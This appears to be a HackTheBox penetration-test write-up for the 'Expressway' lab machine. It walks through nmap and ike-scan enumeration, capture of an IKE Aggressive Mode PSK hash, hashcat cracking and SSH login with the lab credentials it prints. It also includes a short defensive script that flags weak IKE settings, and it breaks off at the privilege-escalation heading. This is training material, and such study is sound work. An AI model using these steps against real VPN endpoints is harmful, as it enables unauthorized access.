HackTheBox: Expressway - Penetration Test Notes

Machine Information

  • Hostname: expressway.htb
  • Difficulty: Easy
  • Operating system: Linux (Debian)
  • Services: SSH, IPSec VPN

Summary

Expressway is a Linux host that demonstrates the impact of a weak IPSec VPN configuration and a sudo vulnerability. Initial access is obtained by using IKE Aggressive Mode to capture and crack a weak pre-shared key (PSK), which yields SSH access. Privilege escalation is achieved through CVE-2025-32463, the sudo chroot escape vulnerability.


Information Gathering

Initial Port Scan

Start with a standard TCP service scan to identify open ports and running services:

nmap -sV -sC 10.129.x.x

Full results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:45 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds

Only SSH is exposed over TCP, so deeper probing is needed.

UDP Scan

Since the TCP results are limited, continue by probing UDP services:

nmap -sU 10.129.x.x --min-rate 5000

Full results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:48 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.011s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
500/udp   open   isakmp

Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds

Port 500/udp indicates an IPSec VPN service. ISAKMP (Internet Security Association and Key Management Protocol) is used to establish the security associations for IPSec.


VPN Service Analysis

IKE (Internet Key Exchange) Enumeration

Port 500/udp points to an IPSec VPN, so enumerate the IKE service with ike-scan:

sudo ike-scan -M expressway.htb

Full output:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Main Mode Handshake returned
	HDR=(CKY-R=9f82d861ee3ca556)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.124 seconds (8.07 hosts/sec).  1 returned handshake; 0 returned notify

Key information:

  • Main Mode handshake succeeded
  • Encryption: 3DES (weak by modern standards)
  • Hash: SHA1
  • Authentication: PSK (pre-shared key)
  • XAUTH support detected
  • Dead Peer Detection (DPD) enabled

Aggressive Mode Test

Main Mode protects the hash exchange, whereas Aggressive Mode sends the responder's hash in the clear before the session is encrypted, so it can be cracked offline:

sudo ike-scan -A -Ppsk.txt expressway.htb

Key findings:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Aggressive Mode Handshake returned 
	HDR=(CKY-R=11ddb728fb4c93f1) 
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) 
	KeyExchange(128 bytes) 
	Nonce(32 bytes) 
	ID(Type=ID_USER_FQDN, ike@expressway.htb) 
	VID=09002689dfd6b712 (XAUTH) 
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 
	Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.016 seconds (60.74 hosts/sec).  1 returned handshake; 0 returned notify

Success! Aggressive Mode leaked:

  • User identity: ike@expressway.htb
  • PSK hash saved to psk.txt
  • The complete handshake, including the key exchange, Nonce and Hash data, was captured
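As an added audit helper (not part of the original write-up and not an ike-scan feature): it parses responder output like the two ike-scan captures above and flags the weak IKEv1 settings a defender should fix. The weak-value checklist is my own assumption, and the sample captures are constructed from the output shown above.

```python
import re

# Constructed samples: the two ike-scan responder captures from the write-up, abridged.
MAIN_MODE = """10.129.x.x\tMain Mode Handshake returned
\tHDR=(CKY-R=9f82d861ee3ca556)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tVID=09002689dfd6b712 (XAUTH)
"""
AGGRESSIVE_MODE = """10.129.x.x\tAggressive Mode Handshake returned
\tHDR=(CKY-R=11ddb728fb4c93f1)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tID(Type=ID_USER_FQDN, ike@expressway.htb)
\tVID=09002689dfd6b712 (XAUTH)
\tHash(20 bytes)
"""

# Weak-configuration indicators for an IKEv1 responder (assumed checklist, my own).
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1", "2", "5"}   # modp768 / modp1024 / modp1536

def parse_sa(text):
    """Return the SA transform attributes (Enc, Hash, Group, Auth, ...) as a dict."""
    m = re.search(r"SA=\((.*?)\)", text)
    return dict(kv.split("=", 1) for kv in m.group(1).split()) if m else {}

def audit_ike_scan(text):
    """Return a list of findings for one ike-scan host block, in fixed order."""
    sa = parse_sa(text)
    findings = []
    # Aggressive Mode + PSK: the responder hash is exposed to offline cracking.
    if "Aggressive Mode Handshake returned" in text and sa.get("Auth") == "PSK":
        findings.append("aggressive-mode-psk: responder hash exposed to offline cracking")
    if sa.get("Enc") in WEAK_ENC:
        findings.append(f"weak-encryption: {sa['Enc']}")
    if sa.get("Hash") in WEAK_HASH:
        findings.append(f"weak-hash: {sa['Hash']}")
    if sa.get("Group", "").split(":")[0] in WEAK_GROUPS:
        findings.append(f"weak-dh-group: {sa['Group']}")
    if "(XAUTH)" in text:
        findings.append("xauth-offered: password-based user authentication in use")
    return findings

if __name__ == "__main__":
    for name, capture in (("main", MAIN_MODE), ("aggressive", AGGRESSIVE_MODE)):
        print(name, audit_ike_scan(capture))
```

Disabling Aggressive Mode, or moving to IKEv2 with certificate authentication, removes the first finding; the remaining ones are fixed by choosing AES, SHA-2 and a DH group of at least 2048 bits.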

Hash Cracking

Extracting the PSK

The Aggressive Mode response contains the IKE PSK hash; crack it with hashcat:

hashcat psk.txt /usr/share/wordlists/rockyou.txt

Hashcat auto-detects the hash type as:

  • Hash mode: 5400 (IKE-PSK SHA1)

Show the cracked result:

hashcat psk.txt /usr/share/wordlists/rockyou.txt --show

Full output:

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5400 | IKE-PSK SHA1 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

ac40728b45d9e097252ecef2c31da0e2d081ccc2163b6b6cac087a087ad8ded7ed8f27539964b2779e2c5e547d74aa282b3a8afd449d4b8cbbf4cfa9ad0cfc896b65a90599b84b2b67728cb434db8bf048897070db8996988ba70d584167d5c029bb8e36e31f123ce2bafa9f9aa850fcb917aa2ecc8d1a07c64ab32016e03533:168cef94af426be072780df8b134faf08741bf3b62e1e93c657a19f0e11a2fca668da45cc9c7561100ce28085fd3e27136d731225549c71e77379e75fc2224676f4219a91f9cac53e8fc849b4d72d633b7ad42f138a2c1f55416db4c428e6d6d8d2dbeada86dc81d9d1c040795080f91f9237f793ac4f038db157644ecd8a724:11ddb728fb4c93f1:ecb2bdd2ba3e7df7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e68:0925fbf9f188daf8bb3f4fbace1167d63a0e63a0:2a6b8d6ae489335962160c9caeb668bf7e77b6c2e51a5675d693504a87d1b093:b211eb1d061230d3e072758b8e581cff96aecee1:freakingrockstarontheroad

Cracked credentials:

  • Username: ike
  • Password: freakingrockstarontheroad


The password is a phrase from the rockyou wordlist, which underlines the importance of using strong, unique PSKs.


Initial Access

SSH Login

Log in to the host over SSH with the recovered credentials:

ssh ike@expressway.htb
# Password: freakingrockstarontheroad

User Flag

After logging in, read the user flag file:

cat /home/ike/user.txt

Privilege Escalation